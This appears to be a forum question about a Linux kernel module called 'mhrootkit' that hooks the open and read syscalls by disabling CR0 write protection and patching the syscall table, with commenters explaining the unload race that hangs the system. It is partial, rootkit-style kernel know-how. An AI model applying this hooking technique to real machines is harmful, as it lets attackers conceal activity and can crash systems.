# Race condition in replace linux kernel system call?

Tags: linux, linux-kernel, kernel

I wrote a program to replace linux kernel system call. It works well except `rmmod` sometimes hangs the system

In one terminal run:

```
for i in `seq 1000`; do insmod mhrootkit.ko; sync; rmmod mhrootkit; done
```

then on another termimal run:

```
dmesg
```

Then the system hangs. I think there may be some race condtions. Here is a code snippet:

```
int __init mhrootkit_init(void) {
    unsigned long cr0;

    printk(KERN_INFO "Mahua rootkit init\n");

    sys_call_table = get_sys_call_table();
    if (!sys_call_table)
            return -1;

    /* hook */
    cr0 = read_cr0();
    write_cr0(cr0 & ~0x10000);

    /* open */
    ori_sys_open = (open_func)sys_call_table[__NR_open];
    sys_call_table[__NR_open] = (unsigned long*)fake_open;

    /* read */
    ori_sys_read = (read_func)sys_call_table[__NR_read];
    sys_call_table[__NR_read] = (unsigned long*)fake_read;

    write_cr0(cr0);
    /* hook end */

    /* create proc file */
    procf = proc_create("mhctl", 0600, NULL, &fops);
    if (!procf)
            printk("create proc file failed\n");

    return 0;
}

void __exit mhrootkit_exit(void) {
    unsigned long cr0;

    printk(KERN_INFO "Mahua rootkit exit\n");

    /* restore hook */
    cr0 = read_cr0();
    write_cr0(cr0 & ~0x10000);

    sys_call_table[__NR_open] = (unsigned long*)ori_sys_open;
    sys_call_table[__NR_read] = (unsigned long*)ori_sys_read;

    write_cr0(cr0);

    /* remove proc file */
    proc_remove(procf);
}
```

HardWare: Vmware Workstation 12 Player

OS: CentOS 7.2.1511

I think the problem is when I restore the system call entry and exit, 'someone' may hold the wild pointer(`fake_open/fake_read`). Then I add an atomic counter to ref open and read operation. But it still hangs, nothing better. Anyone idea?

Comment: `I think the problem is when I restore the system call entry and exit, there may 'someone' hold the wild pointer(fake_open/fake_read).` - Yes, there is a race in syscall restoring call (at module's exit) and syscall using. And I know no way for eliminate this race completely. Note, that such syscall hooking is mostly for *educational purposes*. Otherwise hooking technics provided by the kernel should be used.

Comment: @Tsyvarev Thanks, I agree, and I found that the atomic counter didn't work due to the same reason. One process hold the fake pointer(not runing atomic inc/dec yet), and our module want exit and checking atomic ref, nobody in these fake functions, then exit. Next, at a time, the fake pointer is called. and the system hang.